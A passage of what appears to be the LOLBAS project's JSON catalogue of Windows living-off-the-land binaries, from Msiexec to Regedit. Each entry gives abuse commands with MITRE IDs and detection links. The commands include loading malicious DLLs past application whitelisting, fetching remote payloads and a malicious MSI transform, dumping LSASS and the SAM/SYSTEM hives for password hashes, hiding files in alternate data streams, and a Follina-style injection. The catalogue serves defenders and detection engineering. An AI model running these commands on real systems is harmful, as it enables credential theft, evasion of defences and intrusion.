\"C:\\folder\\evil.dll\"","Description":"Calls DllRegisterServer to register the target DLL.","Usecase":"Execute dll files","Category":"Execute","Privileges":"User","MitreID":"T1218.007","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"msiexec /z \"C:\\folder\\evil.dll\"","Description":"Calls DllUnregisterServer to un-register the target DLL.","Usecase":"Execute dll files","Category":"Execute","Privileges":"User","MitreID":"T1218.007","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"msiexec /i \"https://trustedURL/signed.msi\" TRANSFORMS=\"https://evilurl/evil.mst\" /qb","Description":"Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.","Usecase":"Install trusted and signed msi file, with additional attack code as transformation file, from a remote server","Category":"Execute","Privileges":"User","MitreID":"T1218.007","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\msiexec.exe"},{"Path":"C:\\Windows\\SysWOW64\\msiexec.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"IOC":"msiexec.exe retrieving files from Internet"}],"Resources":[{"Link":"https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/"},{"Link":"https://twitter.com/PhilipTsukerman/status/992021361106268161"},{"Link":"https://badoption.eu/blog/2023/10/03/MSIFortune.html"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"},{"Name":"Netsh.exe","Description":"Netsh is a Windows tool used to manipulate network interface settings.","Author":"Freddie Barr-Smith","Created":"2019-12-24","Commands":[{"Command":"netsh.exe add helper C:\\Users\\User\\file.dll","Description":"Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called","Usecase":"Proxy execution of .dll","Category":"Execute","Privileges":"Admin","MitreID":"T1546.007","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\WINDOWS\\System32\\Netsh.exe"},{"Path":"C:\\WINDOWS\\SysWOW64\\Netsh.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml"},{"IOC":"Netsh initiating a network connection"}],"Resources":[{"Link":"https://freddiebarrsmith.com/trix/trix.html"},{"Link":"https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html"},{"Link":"https://liberty-shell.com/sec/2018/07/28/netshlep/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Netsh/"},{"Name":"Odbcconf.exe","Description":"Used in Windows for managing ODBC connections","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"odbcconf /a {REGSVR c:\\test\\test.dll}","Description":"Execute DllREgisterServer from DLL specified.","Usecase":"Execute dll file using technique that can evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218.008","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"odbcconf INSTALLDRIVER \"lolbas-project|Driver=c:\\test\\test.dll|APILevel=2\"\nodbcconf configsysdsn \"lolbas-project\" \"DSN=lolbas-project\"\n","Description":"Install a driver and load the DLL. Requires administrator privileges.","Usecase":"Execute dll file using technique that can evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218.008","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]},{"Command":"odbcconf -f file.rsp","Description":"Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.","Usecase":"Execute dll file using technique that can evade defensive counter measures","Category":"Execute","Privileges":"User","MitreID":"T1218.008","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\odbcconf.exe"},{"Path":"C:\\Windows\\SysWOW64\\odbcconf.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"Resources":[{"Link":"https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b"},{"Link":"https://github.com/woanware/application-restriction-bypasses"},{"Link":"https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"},{"Name":"OfflineScannerShell.exe","Description":"Windows Defender Offline Shell","Author":"Elliot Killick","Created":"2021-08-16","Commands":[{"Command":"OfflineScannerShell","Description":"Execute mpclient.dll library in the current working directory","Usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows 10, Windows 11","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml"},{"IOC":"OfflineScannerShell.exe should not be run on a normal workstation"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"},{"Name":"OneDriveStandaloneUpdater.exe","Description":"OneDrive Standalone Updater","Author":"Elliot Killick","Created":"2021-08-22","Commands":[{"Command":"OneDriveStandaloneUpdater","Description":"Download a file from the web address specified in HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json","Usecase":"Download a file from the Internet without executing any anomalous executables with suspicious arguments","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10"}],"Full_Path":[{"Path":"%localappdata%\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe"}],"Detection":[{"IOC":"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL"},{"IOC":"Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"}],"Resources":[{"Link":"https://github.com/LOLBAS-Project/LOLBAS/pull/153"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"},{"Name":"Pcalua.exe","Description":"Program Compatibility Assistant","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"pcalua.exe -a calc.exe","Description":"Open the target .EXE using the Program Compatibility Assistant.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"pcalua.exe -a \\\\server\\payload.dll","Description":"Open the target .DLL file with the Program Compatibilty Assistant.","Usecase":"Proxy execution of remote dll file","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10","Tags":[{"Execute":"DLL"}]},{"Command":"pcalua.exe -a C:\\Windows\\system32\\javacpl.cpl -c Java","Description":"Open the target .CPL file with the Program Compatibility Assistant.","Usecase":"Execution of CPL files","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\pcalua.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"Resources":[{"Link":"https://twitter.com/KyleHanslovan/status/912659279806640128"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"},{"Name":"Pcwrun.exe","Description":"Program Compatibility Wizard","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Pcwrun.exe c:\\temp\\beacon.exe","Description":"Open the target .EXE file with the Program Compatibility Wizard.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"Pcwrun.exe /../../$(calc).exe","Description":"Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1202","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\pcwrun.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/991335019833708544"},{"Link":"https://twitter.com/nas_bench/status/1535663791362519040"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"},{"Name":"Pktmon.exe","Description":"Capture Network Packets on the windows 10 with October 2018 Update or later.","Author":"Derek Johnson","Created":"2020-08-12","Commands":[{"Command":"pktmon.exe start --etw","Description":"Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop","Usecase":"use this a built in network sniffer on windows 10 to capture senstive traffic","Category":"Reconnaissance","Privileges":"Administrator","MitreID":"T1040","OperatingSystem":"Windows 10 1809 and later, Windows 11"},{"Command":"pktmon.exe filter add -p 445","Description":"Select Desired ports for packet capture","Usecase":"Look for interesting traffic such as telent or FTP","Category":"Reconnaissance","Privileges":"Administrator","MitreID":"T1040","OperatingSystem":"Windows 10 1809 and later, Windows 11"}],"Full_Path":[{"Path":"c:\\windows\\system32\\pktmon.exe"},{"Path":"c:\\windows\\syswow64\\pktmon.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"IOC":".etl files found on system"}],"Resources":[{"Link":"https://binar-x79.com/windows-10-secret-sniffer/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"},{"Name":"Pnputil.exe","Description":"Used for installing drivers","Author":"Hai vaknin (lux)","Created":"2020-12-25","Commands":[{"Command":"pnputil.exe -i -a C:\\Users\\hai\\Desktop\\mo.inf","Description":"Used for installing drivers","Usecase":"Add malicious driver","Category":"Execute","Privileges":"Administrator","MitreID":"T1547","OperatingSystem":"Windows 7, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\system32\\pnputil.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"},{"Name":"Presentationhost.exe","Description":"File is used for executing Browser applications","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Presentationhost.exe C:\\temp\\Evil.xbap","Description":"Executes the target XAML Browser Application (XBAP) file","Usecase":"Execute code within xbap files","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10"},{"Command":"Presentationhost.exe https://example.com/payload","Description":"It will download a remote payload and place it in INetCache.","Usecase":"Downloads payload from remote server","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\Presentationhost.exe"},{"Path":"C:\\Windows\\SysWOW64\\Presentationhost.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"IOC":"Execution of .xbap files may not be common on production workstations"}],"Resources":[{"Link":"https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf"},{"Link":"https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"},{"Name":"Print.exe","Description":"Used by Windows to send files to the printer","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"print /D:C:\\ADS\\File.txt:file.exe C:\\ADS\\File.exe","Description":"Copy file.exe into the Alternate Data Stream (ADS) of file.txt.","Usecase":"Hide binary file in alternate data stream to potentially bypass defensive counter measures","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"print /D:C:\\ADS\\CopyOfFile.exe C:\\ADS\\FileToCopy.exe","Description":"Copy FileToCopy.exe to the target C:\\ADS\\CopyOfFile.exe","Usecase":"Copy files","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"print /D:C:\\OutFolder\\outfile.exe \\\\WebDavServer\\Folder\\File.exe","Description":"Copy File.exe from a network share to the target c:\\OutFolder\\outfile.exe.","Usecase":"Copy/Download file from remote server","Category":"Copy","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\print.exe"},{"Path":"C:\\Windows\\SysWOW64\\print.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"IOC":"Print.exe retrieving files from internet"},{"IOC":"Print.exe creating executable files on disk"}],"Resources":[{"Link":"https://twitter.com/Oddvarmoe/status/985518877076541440"},{"Link":"https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Print/"},{"Name":"PrintBrm.exe","Description":"Printer Migration Command-Line Tool","Author":"Elliot Killick","Created":"2021-06-21","Commands":[{"Command":"PrintBrm -b -d \\\\1.2.3.4\\share\\example_folder -f C:\\Users\\user\\Desktop\\new.zip","Description":"Create a ZIP file from a folder in a remote drive","Usecase":"Exfiltrate the contents of a remote folder on a UNC share into a zip file","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]},{"Command":"PrintBrm -r -f C:\\Users\\user\\Desktop\\data.txt:hidden.zip -d C:\\Users\\user\\Desktop\\new_folder","Description":"Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder","Usecase":"Decompress and extract a ZIP file stored on an alternate data stream to a new folder","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Type":"Compression"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"IOC":"PrintBrm.exe should not be run on a normal workstation"}],"Resources":[{"Link":"https://twitter.com/elliotkillick/status/1404117015447670800"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"},{"Name":"Provlaunch.exe","Description":"Launcher process","Author":"Grzegorz Tworek","Created":"2023-06-30","Commands":[{"Command":"provlaunch.exe LOLBin","Description":"Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. \"reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0\" and \"reg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe\". Registry keys are deleted after successful execution.","Usecase":"Executes arbitrary command","Category":"Execute","Privileges":"Administrator","MitreID":"T1218","OperatingSystem":"Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022"}],"Full_Path":[{"Path":"c:\\windows\\system32\\provlaunch.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml"},{"IOC":"c:\\windows\\system32\\provlaunch.exe executions"},{"IOC":"Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands subkeys"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1674399582162153472"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/"},{"Name":"Psr.exe","Description":"Windows Problem Steps Recorder, used to record screen and clicks.","Author":"Leon Rodenko","Created":"2020-06-27","Commands":[{"Command":"psr.exe /start /output D:\\test.zip /sc 1 /gui 0","Description":"Record a user screen without creating a GUI. You should use \"psr.exe /stop\" to stop recording and create output file.","Usecase":"Can be used to take screenshots of the user environment","Category":"Reconnaissance","Privileges":"User","MitreID":"T1113","OperatingSystem":"since Windows 7 (client) / Windows 2008 R2"}],"Full_Path":[{"Path":"c:\\windows\\system32\\psr.exe"},{"Path":"c:\\windows\\syswow64\\psr.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml"},{"IOC":"psr.exe spawned"},{"IOC":"suspicious activity when running with \"/gui 0\" flag"}],"Resources":[{"Link":"https://social.technet.microsoft.com/wiki/contents/articles/51722.windows-problem-steps-recorder-psr-quick-and-easy-documenting-of-your-steps-and-procedures.aspx"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Psr/"},{"Name":"Rasautou.exe","Description":"Windows Remote Access Dialer","Author":"Tony Lambert","Created":"2020-01-10","Commands":[{"Command":"rasautou -d powershell.dll -p powershell -a a -e e","Description":"Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.","Usecase":"Execute DLL code","Category":"Execute","Privileges":"User, Administrator in Windows 8","MitreID":"T1218","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"C:\\Windows\\System32\\rasautou.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml"},{"IOC":"rasautou.exe command line containing -d and -p"}],"Resources":[{"Link":"https://github.com/fireeye/DueDLLigence"},{"Link":"https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Rasautou/"},{"Name":"rdrleakdiag.exe","Description":"Microsoft Windows resource leak diagnostic tool","Author":"John Dwyer","Created":"2022-05-18","Commands":[{"Command":"rdrleakdiag.exe /p 940 /o c:\\evil /fullmemdmp /wait 1","Description":"Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).","Usecase":"Dump process by PID.","Category":"Dump","Privileges":"User","MitreID":"T1003","OperatingSystem":"Windows"},{"Command":"rdrleakdiag.exe /p 832 /o c:\\evil /fullmemdmp /wait 1","Description":"Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).","Usecase":"Dump LSASS process.","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.001","OperatingSystem":"Windows"},{"Command":"rdrleakdiag.exe /p 832 /o c:\\evil /fullmemdmp /snap","Description":"After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).","Usecase":"Dump LSASS process mutliple times.","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.001","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"c:\\windows\\system32\\rdrleakdiag.exe"},{"Path":"c:\\Windows\\SysWOW64\\rdrleakdiag.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml"},{"Elastic":"https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"Resources":[{"Link":"https://twitter.com/0gtweet/status/1299071304805560321?s=21"},{"Link":"https://www.pureid.io/dumping-abusing-windows-credentials-part-1/"},{"Link":"https://github.com/LOLBAS-Project/LOLBAS/issues/84"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Rdrleakdiag/"},{"Name":"Reg.exe","Description":"Used to manipulate the registry","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"reg export HKLM\\SOFTWARE\\Microsoft\\Evilreg c:\\ads\\file.txt:evilreg.reg","Description":"Export the target Registry key and save it to the specified .REG file within an Alternate data stream.","Usecase":"Hide/plant registry information in Alternate data stream for later use","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"reg save HKLM\\SECURITY c:\\test\\security.bak && reg save HKLM\\SYSTEM c:\\test\\system.bak && reg save HKLM\\SAM c:\\test\\sam.bak","Description":"Dump registry hives (SAM, SYSTEM, SECURITY) to retrieve password hashes and key material","Usecase":"Dump credentials from the Security Account Manager (SAM)","Category":"Credentials","Privileges":"Administrator","MitreID":"T1003.002","OperatingSystem":"Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Windows\\System32\\reg.exe"},{"Path":"C:\\Windows\\SysWOW64\\reg.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/attempted_credential_dump_from_registry_via_reg_exe.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_dump_registry_hives.toml"},{"IOC":"reg.exe writing to an ADS"}],"Resources":[{"Link":"https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f"},{"Link":"https://pure.security/dumping-windows-credentials/"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Reg/"},{"Name":"Regasm.exe","Description":"Part of .NET","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"regasm.exe AllTheThingsx64.dll","Description":"Loads the target .DLL file and executes the RegisterClass function.","Usecase":"Execute code and bypass Application whitelisting","Category":"AWL Bypass","Privileges":"Local Admin","MitreID":"T1218.009","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]},{"Command":"regasm.exe /U AllTheThingsx64.dll","Description":"Loads the target .DLL file and executes the UnRegisterClass function.","Usecase":"Execute code and bypass Application whitelisting","Category":"Execute","Privileges":"User","MitreID":"T1218.009","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]}],"Full_Path":[{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe"},{"Path":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"Splunk":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"IOC":"regasm.exe executing dll file"}],"Resources":[{"Link":"https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/"},{"Link":"https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/"},{"Link":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}],"url":"https://lolbas-project.github.io/lolbas/Binaries/Regasm/"},{"Name":"Regedit.exe","Description":"Used by Windows to manipulate registry","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"regedit /E c:\\ads\\file.txt:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey","Description":"Export the target Registry key to the specified .REG file.","Usecase":"Hide registry data in alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11"},{"Command":"regedit C:\\ads\\file.txt:regfile.reg","Description":"Import the target .REG file into the Registry.","Usecase":"Import hidden registry data from alternate data stream","Category":"ADS","Privileges":"User","MitreID":"T1564.004","OperatingSystem":"Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 